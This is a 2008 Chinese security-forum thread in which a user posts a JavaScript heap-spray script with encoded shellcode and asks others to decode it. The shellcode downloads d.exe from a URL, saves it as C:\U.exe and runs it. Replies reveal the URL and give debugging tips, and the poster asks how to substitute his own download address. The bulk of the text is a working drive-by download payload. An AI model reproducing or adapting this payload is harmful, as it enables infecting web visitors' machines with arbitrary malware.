首页
社区
课程
招聘
[旧帖] [求助]哪位高人帮忙解密一下这个shellcode 0.00雪花
发表于: 2008-1-8 13:16 5289

[旧帖] [求助]哪位高人帮忙解密一下这个shellcode 0.00雪花

2008-1-8 13:16
5289
<script>
   var heapSprayToAddress = 0x05050505;
   var shellcode = unescape("%u9090"+"%u9090"+
"%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320" +
"%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2" +
"%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b" +
"%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b" +
"%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a" +
"%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b" +
"%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40" +
"%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83" +
"%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8" +
"%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52" +
"%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff" +
"%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40" +
"%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2f3a" +
"%u312f%u3732%u302e%u302e%u312e%u742f%u7365%u2f74" +
"%u2e64%u7865%u0065");
var heapBlockSize = 0x400000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0505%u0505");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
       memory = spraySlide + shellcode;
}

[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

收藏
免费 0
支持
分享
最新回复 (6)
雪    币: 318
活跃值: (36)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
解密后的地址为http://127.0.0.1/test/d.exe
在线解密
http://www.cha88.cn/safe/shellcode.php
2008-1-8 17:52
0
雪    币: 199
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
谢谢!我要想改这段就是把自己的地址换成code?
2008-1-8 19:32
0
雪    币: 199
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
我怎么没解密成你那个样子啊,我解密出来又是一串不明白的东西
%u2522%u3975%u3930%u2230%u222b%u7525%u3039%u3039%u2b22%u0d20%u220a%u7525%u3435%u6265%u7525%u3537%u6238%u7525%u6238%u6333%u7525%u3533%u3437%u7525%u3330%u3837%u7525%u3635%u3566%u7525%u3637%u6238%u7525%u3330%u3032%u2022%u0d2b%u220a%u7525%u3333%u3566%u7525%u3934%u3963%u7525%u6461%u3134%u7525%u6264%u3333%u7525%u6630%u3633%u7525%u3431%u6562%u7525%u3833%u3832%u7525%u3437%u3266%u2022%u0d2b%u220a%u7525%u3163%u3830%u7525%u6430%u6263%u7525%u6164%u3330%u7525%u6265%u3034%u7525%u6233%u6665%u7525%u3537%u6664%u7525%u6535%u3765%u7525%u6535%u6238%u2022%u0d2b%u220a%u7525%u3330%u3432%u7525%u3636%u6464%u7525%u6330%u6238%u7525%u6238%u6234%u7525%u6331%u6535%u7525%u6464%u3330%u7525%u3430%u6238%u7525%u3330%u6238%u2022%u0d2b%u220a%u7525%u3363%u3563%u7525%u3237%u3537%u7525%u6436%u6336%u7525%u6536%u6636%u7525%u3436%u6532%u7525%u6336%u6336%u7525%u3334%u3030%u7525%u6335%u6133%u2022%u0d2b%u220a%u7525%u6532%u3535%u7525%u3837%u3536%u7525%u3030%u3536%u7525%u3063%u3333%u7525%u3330%u3436%u7525%u3033%u3034%u7525%u6330%u3837%u7525%u3034%u6238%u2022%u0d2b%u220a%u7525%u6238%u6330%u7525%u6331%u3037%u7525%u6238%u6461%u7525%u3830%u3034%u7525%u3930%u6265%u7525%u3034%u6238%u7525%u6438%u3433%u7525%u6337%u3034%u2022%u0d2b%u220a%u7525%u3034%u6238%u7525%u3539%u6333%u7525%u6538%u6662%u7525%u6530%u6534%u7525%u3865%u6365%u7525%u6666%u3438%u7525%u6666%u6666%u7525%u6365%u3338%u2022%u0d2b%u220a%u7525%u3338%u3430%u7525%u3432%u6332%u7525%u6666%u6333%u7525%u3539%u3064%u7525%u6662%u3035%u7525%u6131%u3633%u7525%u3037%u6632%u7525%u6636%u3865%u2022%u0d2b%u220a%u7525%u6666%u6666%u7525%u6238%u6666%u7525%u3432%u3435%u7525%u6438%u6366%u7525%u6162%u3235%u7525%u6264%u3333%u7525%u3335%u3335%u7525%u6265%u3235%u2022%u0d2b%u220a%u7525%u3335%u3432%u7525%u3064%u6666%u7525%u6662%u6435%u7525%u6566%u3839%u7525%u6530%u6138%u7525%u3335%u3865%u7525%u6666%u6666%u7525%u3338%u6666%u2022%u0d2b%u220a%u7525%u3430%u6365%u7525%u6332%u3338%u7525%u3236%u3432%u7525%u3064%u6666%u7525%u6537%u6662%u7525%u3265%u3864%u7525%u3865%u3337%u7525%u6666%u3034%u2022%u0d2b%u220a%u7525%u6666%u6666%u7525%u6666%u3235%u7525%u3865%u3064%u7525%u6666%u3764%u7525%u6666%u6666%u7525%u3437%u3836%u7525%u3037%u3437%u7525%u6632%u6133%u2022%u0d2b%u220a%u7525%u3133%u6632%u7525%u3733%u3233%u7525%u3033%u6532%u7525%u3033%u6532%u7525%u3133%u6532%u7525%u3437%u6632%u7525%u3337%u3536%u7525%u6632%u3437%u2022%u0d2b%u220a%u7525%u6532%u3436%u7525%u3837%u3536%u7525%u3030%u3536%u0022
2008-1-8 19:34
0
雪    币: 199
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
老大,你在吗?给我讲,那段网址是怎么解出来的。!
我去了你说的网站只能解成unicode,接下来怎么办啊?
2008-1-9 12:11
0
雪    币: 4574
活跃值: (3562)
能力值: ( LV12,RANK:230 )
在线值:
发帖
回帖
粉丝
6
我要是你,我会把前面那两个90(NOP)换成%uCCCC,然后用IE加载,用cdb挂上去看
2008-1-24 12:06
0
雪    币: 9731
活跃值: (3091)
能力值: (RANK:520 )
在线值:
发帖
回帖
粉丝
7
就是unicode编码嘛
对应16进制 shellcoe : eb 54 8b 75 3c 8b ...........
按这个顺序列出来  看汇编代码  ,一般挂马地址在shellcode末尾.
2008-1-24 12:44
0
游客
登录 | 注册 方可回帖
返回
//